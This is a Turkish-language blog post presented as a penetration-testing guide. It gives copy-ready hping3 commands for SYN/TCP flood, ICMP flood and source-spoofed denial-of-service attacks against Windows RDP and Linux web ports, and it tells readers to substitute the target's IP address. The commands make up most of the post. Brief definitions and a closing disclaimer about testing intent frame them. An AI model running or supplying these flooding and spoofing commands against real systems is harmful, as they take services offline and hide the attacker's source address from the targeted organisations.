CentOS Blog

Penetration Testi İçin Saldırı Çeşitleri

Merhaba arkadaşlar, sizlere bu makalemde penetration testi için SYN, Flood, Spoof, UDP/TCP, ICMP ve DDoS Saldırısı konularından kısaca bahsedeceğim.

Penetration Testimizi Hping3 programı üzerinden gerçekleştireceğiz. Linux tabanlı sunucunuza kurulumu çok basittir. Kali Linux üzerinde geliyor. İlk öncelikle Hping3 programı indirme ve kurma işlemini anlatacağım.

Adım 1: Epel yüklemeniz olacaktır.

Epel yükleme işlemi için Epel makalemizden destek alabilirsiniz.

Adım 2: Hping3 Programı kurulumu

yum install hping3

Sıra Geldi Windows Sunucu Üzerinde Penetration Testi Yapmaya;

1) Flood ICMP Saldırısı (DDoS saldırısı Distributed Denial of Service attack).

hping3 -i u1 -S -p 3389 --flood 192.168.1.5 -o 64 -w 64 -d 64 -t 64 -K --icmp-gw -K --icmp-addr
Yukarıda -p olarak verilen kısım atak yapacağınız port numarasını yazacaksınız. 192.168.1.5 olarak verilen ip yerine atak yapmak istediğiniz ip adresini yazmanız gerekmektedir. Diğer bir komut ise u1 komutu bu komut ise mikrosaniye içinde hedef ip gidecek atağa belirliyor.

Flood SYN;

SYN saldırısı (SYN flood), hizmeti engelleme saldırısının bir biçimidir. Bu saldırı biçiminde bir saldırgan sistemin yasal trafiğini isteklere cevap veremeyecek duruma getirmek için yeterli sunucu kaynaklarını tüketme girişiminde bulunarak, hedef alınan sisteme ardışık SYN istekleri (SYN requests) gönderir.
Kaynak: https://tr.wikipedia.org/wiki/SYN_saldırısı

2) Flood UDP/TCP Saldırısı (DDoS saldırısı Distributed Denial of Service attack).

hping3 -i u1 -S -p 3389 --flood 192.168.1.5 -o 64 -w 64 -d 64 -t 64 --tcp-timestamp

3) DDoS saldırısı Distributed Denial of Service attack

hping3 -i u1 -S -p 3389 192.168.1.5 -o 64 -w 64 -d 64 -t 64 -c 64

Şimdi Sıra Linux Tabanlı Sunucular Üzerinde Penetration Testi Yapmaya Geldi;

1) Flood UDP/TCP Saldırısı (DDoS saldırısı Distributed Denial of Service attack).

hping3 -i u1 -S -p 80 --flood 192.168.1.5 -o 64 -w 64 -c 64 -d 654 -t 64 --tcp-timestamp

Yukarıda -p olarak verilen kısım atak yapacağınız port numarasını yazacaksınız. 192.168.1.5 olarak verilen ip yerine atak yapmak istediğiniz ip adresini yazmanız gerekmektedir. Diğer bir komut ise u1 komutu bu komut ise mikrosaniye içinde hedef ip gidecek atağa belirliyor.

2) Flood UDP/TCP & Spoof Saldırısı (DDoS saldırısı Distributed Denial of Service attack).

hping3 -i u1 -S -p 80 --flood 192.168.1.5 -o 64 -w 64 -c 64 -d 654 -t 64 --tcp-timestamp -a 192.168.1.6

Spoof saldırısı;

IP spoofing en sık DoS(Denial of Service)saldırılarında kullanılır.Bu tür saldırılarda amaç, hedef bilgisayarın sorgu trafiğini aşırı miktarda artırmaktır, saldırgan saldırı paketlerine yanıt almayı önemsemez.Sahte adres kullanarak paket göndermek bu yüzden uygundur.Bu amaçlı saldırılar için ip spoofing’in ek avantajları vardır-Her sahte paket farklı bir adresten geliyormuş gibi görünür bu sebeple filtrelemek daha zordur,ve saldırının gerçek kaynağı gizlenir.
Kaynak: https://tr.wikipedia.org/wiki/IP_spoofing

3) DDoS & Spoof saldırısı Distributed Denial of Service attack

hping3 -i u1 -S -p 3389 192.168.1.5 -o 64 -w 64 -d 64 -t 64 -c 64 -a 192.168.1.6

Gelen saldırıların tespiti için aşağıdaki makalemiz üzerinden destek alabilirsiniz.

Netstat Nedir, Saldırı Nasıl Engellenir

Konu Hakkında Yazar ve Editör Tarafından Önemli Açıklama;

Yukarıda verilen bilgi tamamen Penetration testi için amaçlanmıştır. Saldırı tipleri ufak çaplı olarak yazılımış olup saldırı boyutu yükseltme veya saldırılar hakkında detaylı açıklama bulunmamaktadır. Sunucu veri güvenliği yükseltme ve atak yakalama tespiti için yazılmıştır. Konu hakkında CentOSBlog.net yönetimi olarak her hangi bir sorumluluk almamaktadır.

Bir Başka Makalede Görüşmek Üzere Hoşça Kalın 🙂

İbrahim Erdoğan